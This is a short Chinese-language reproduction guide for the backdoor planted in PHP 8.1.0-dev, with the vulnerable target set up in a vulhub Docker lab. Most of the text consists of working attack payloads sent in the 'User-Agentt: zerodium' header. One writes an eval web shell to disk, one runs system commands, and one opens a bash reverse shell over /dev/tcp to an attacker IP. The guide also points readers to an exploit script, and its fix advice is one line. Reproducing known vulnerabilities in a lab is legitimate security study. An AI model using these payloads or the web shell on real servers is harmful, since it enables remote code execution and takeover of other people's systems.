0x01 简介
PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。
0x02 影响版本
PHP 8.1.0-dev
0x03 环境搭建
使用vulhub进行搭建:
cd vulhub/php/8.1-backdoor
sudo docker-compose up -d
访问主页:
http://ip:8080
0x04 漏洞复现
后门存在于user-agentt:zerodium字段,后面加上相应的php函数,得到执行结果:
我们再来查看phpinfo(),通过浏览器插件Modify Header,点击Open options page,修改该网站的Headers:
再来执行写入shell:
User-Agentt: zerodiumfile_put_contents('indes.php','<?php eval($_POST["xx11"]);?>');
连接成功:
执行命令:
User-Agentt: zerodiumsystem("id");
反弹shell:
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/IP/8000 0>&1'");
EXP:
python3 PHP-8.1.0-dev-Backdoor-RCE.py -u http://ip:8080 -c id
exp后台回复php-8.1.0-dev获取。
0x05修复建议
1、建议更换版本
长按下方图片关注我们: